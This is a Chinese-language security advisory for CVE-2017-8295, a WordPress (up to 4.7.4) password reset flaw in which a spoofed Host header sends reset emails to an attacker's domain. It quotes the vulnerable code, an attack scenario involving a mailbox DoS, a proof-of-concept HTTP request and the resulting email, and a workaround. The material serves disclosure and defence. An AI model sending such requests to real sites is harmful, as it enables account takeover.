WordPress曝未经授权的密码重置漏洞(CVE-2017-8295 )

简介:
  • 漏洞提交者:Dawid Golunski
  • 漏洞编号:CVE-2017-8295
  • 发布日期:2017-05-03
  • 修订版本:1.0
  • 漏洞危害:中/高

漏洞

一、漏洞

WordPress内核<= 4.7.4存在未经授权的密码重置(0day)

二、背景

WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。截止2017年2月,Alexa排名前1000万的站点中约有27.5%使用该管理系统。据报道有超过6000万站点使用WordPress进行站点管理或者作为博客系统。

三、介绍

WordPress的重置密码功能存在漏洞,在某些情况下不需要使用之前的身份令牌验证获取密码重置链接。

该攻击可导致攻击者在未经授权的情况下获取用户Wordpress后台管理权限。

四、描述

该漏洞源于WordPress默认使用不可信的数据。当生成一个密码重置邮件时应当是仅发送给与帐户相关联的电子邮件。

从下面的代码片段可以看出,在调用PHP mail()函数前创建了一个From email头

 
  1. ------[ wp-includes/pluggable.php ]------ 
  2.  
  3. ... 
  4.  
  5. if ( !isset( $from_email ) ) { 
  6.         // Get the site domain and get rid of www. 
  7.         $sitename = strtolower( $_SERVER['SERVER_NAME'] ); 
  8.         if ( substr( $sitename, 0, 4 ) == 'www.' ) { 
  9.                 $sitename = substr( $sitename, 4 ); 
  10.         } 
  11.  
  12.         $from_email = 'wordpress@' . $sitename; 
  13.  
  14. ... 
  15.  
  16. ----------------------------------------- 

正如我们所看到的,Wordpress为了生成重置邮件创建的一个From/Return-Path(发件人/收件人)头,使用SERVER_NAME变量以获取服务器的主机名。

然而,诸如Apache的主流web服务器默认使用由客户端提供的主机名来设置SERVER_NAME变量(参考Apache文档)

由于SERVER_NAME可以进行修改,攻击者可以任意设置该值,例如attackers-mxserver.com

这将导致Wordpress的$from_email变为wordpress@attackers-mxserver.com,最终导致包含From/Return-Path(发件人/收件人)设置的密码重置邮件发送到了该恶意邮件地址。

至于攻击者可以修改哪那一封电子邮件的头信息,这取决于服务器环境(参考PHP文档)

基于邮件服务器的配置,可能导致被修改过邮件头的恶意收件人/发件人地址的电子邮件发送给WordPress用户。

这使得攻击者能够在不需要进行交互就可以截取本该是需要进行交互才能进行的操作的密码重置邮件。

攻击场景:

如果攻击者知道用户的电子邮件地址。为了让密码重置邮件被服务器拒收,或者无法到达目标地址。他们可以先对用户的电子邮件帐户进行DoS攻击(通过发送多个超过用户磁盘配额的大文件邮件或攻击该DNS服务器)

某些自动回复可能会附加有邮件发送副本

发送多封密码重置邮件给用户,迫使用户对这些没完没了的密码重置邮件进行回复,回复中就包含的密码链接会发送给攻击者。

五、POC

如果攻击者将类似下面的请求发送到默认可通过IP地址访问的Wordpress安装页面(IP-based vhost):

 
  1. -----[ HTTP Request ]---- 
  2.  
  3. POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 
  4. Host: injected-attackers-mxserver.com 
  5. Content-Type: application/x-www-form-urlencoded 
  6. Content-Length: 56 
  7.  
  8. user_login=admin&redirect_to=&wp-submit=Get+New+Password 
  9.  
  10. ------------------------ 

WordPress将触发管理员账户的密码重置功能

由于修改了主机头,SERVER_NAME变量将被设置为攻击者所选择的主机名,因此Wordpress会将以下电子邮件头信息和正文传递给/usr/bin/sendmail

 
  1. ------[ resulting e-mail ]----- 
  2.  
  3. Subject: [CompanyX WP] Password Reset 
  4. Return-Path: <wordpress@attackers-mxserver.com> 
  5. From: WordPress <wordpress@attackers-mxserver.com> 
  6. Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> 
  7. X-Priority: 3 
  8. MIME-Version: 1.0 
  9. Content-Type: text/plain; charset=UTF-8 
  10. Content-Transfer-Encoding: 8bit 

有人请求将以下账户的密码进行重置:

 
  1. http://companyX-wp/wp/wordpress/ 
  2. Username: admin 

如果是弄错了,直接忽略该邮件就好。重置密码请访问以下地址:

 
  1. http://companyx-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin%3E 

正如我们看到的,Return-Path, From, 以及Message-ID字段都是攻击者控制的域

通过bash脚本替换/usr/sbin/sendmail以执行头的验证:

 
  1. #!/bin/bash 
  2. cat > /tmp/outgoing-email 

六、业务影响

在利用成功的基础上,攻击者可重置用户密码并且未经授权获取WordPress账户访问权限。

七、系统影响

WordPress至最新版本4.7.4全部受影响

八、解决方案

目前没有官方解决方案可用。作为临时解决方案,用户可以启用UseCanonicalName执行SERVER_NAME静态值(参考Apache)

九、参考文献

  • https://legalhackers.com
  • https://ExploitBox.io
  • Vendor site:
  • https://wordpress.org
  • http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname
  • http://php.net/manual/en/function.mail.php
  • https://tools.ietf.org/html/rfc5321

作者:鸢尾
来源:51CTO

相关文章
|
1月前
|
存储 安全 前端开发
WordPress未经身份验证的远程代码执行CVE-2024-25600漏洞分析
WordPress未经身份验证的远程代码执行CVE-2024-25600漏洞分析
67 0
|
7月前
|
Web App开发 移动开发 安全
WordPress插件wp-file-manager任意文件上传漏洞(CVE-2020-25213)
WordPress插件WPFileManager中存在一个严重的安全漏洞,攻击者可以在安装了此插件的任何WordPress网站上任意上传文件并远程代码执行。
259 1
|
11月前
|
SQL 安全 数据库
WordPress插件中的流行的严重错误发布的PoC漏洞
WordPress插件中的流行的严重错误发布的PoC漏洞
|
安全 PHP
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
PHP Everywhere 三个 RCE 漏洞威胁大量 WordPress 网站
170 0
|
数据安全/隐私保护
WordPress新用户注册时/修改密码提示“您的密码重设链接无效”
WordPress新用户注册时/修改密码提示“您的密码重设链接无效”
262 0
|
SQL 安全 前端开发
网站漏洞检测 wordpress sql注入漏洞代码审计与修复
wordpress系统本身代码,很少出现sql注入漏洞,反倒是第三方的插件出现太多太多的漏洞,我们SINE安全发现,仅仅2019年9月份就出现8个插件漏洞,因为第三方开发的插件,技术都参差不齐,对安全方面也不是太懂导致写代码过程中没有对sql注入,以及xss跨站进行前端安全过滤,才导致发生sql注入漏洞。
393 0
网站漏洞检测 wordpress sql注入漏洞代码审计与修复
|
安全 关系型数据库 MySQL
网站漏洞修复对WordPress 致命漏洞注入shell
2019年正月刚开始,WordPress最新版本存在远程代码注入获取SHELL漏洞,该网站漏洞影响的版本是wordpress5.0.0,漏洞的产生是因为image模块导致的,因为代码里可以进行获取目录权限,以及文件包含功能,导致远程代码注入成功。
383 0
网站漏洞修复对WordPress 致命漏洞注入shell
|
SQL 弹性计算 安全
WordPress4.9 最新版本网站安全漏洞详情与修复
wordpress 目前互联网的市场占有率较高,许多站长以及建站公司都在使用这套开源的博客建站系统来设计网站,wordpress的优化以及html静态化,深受google以及搜索引擎的喜欢,全世界大约有着百分之28的网站都在使用这套系统,国外,外贸网站,个人博客使用的最多。
192 0
WordPress4.9 最新版本网站安全漏洞详情与修复
|
安全 数据库
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
2018年6月29日,wordpress爆出最新漏洞,该网站漏洞通杀所有wordpress版本,包括目
210 0
最新2018年6月份Wordpress通杀全版本漏洞 详情及利用方法
|
弹性计算 安全
阿里云提示wordpress IP验证不当漏洞手动处
登录阿里云后台 有漏洞安全修复提示,级别尽快修复,同时给出ECS服务器管理重要通知:您的云服务器(xxx.xx.xxx.xx)由于被检测到对外攻击,已阻断该服务器对其它服务器端口(UDP:ALL)的访问,阻断预计将在2018-04-23 09:56:58时间内结束,请及时进行安全自查。若有疑问,请工单或电话联系阿里云售后
226 0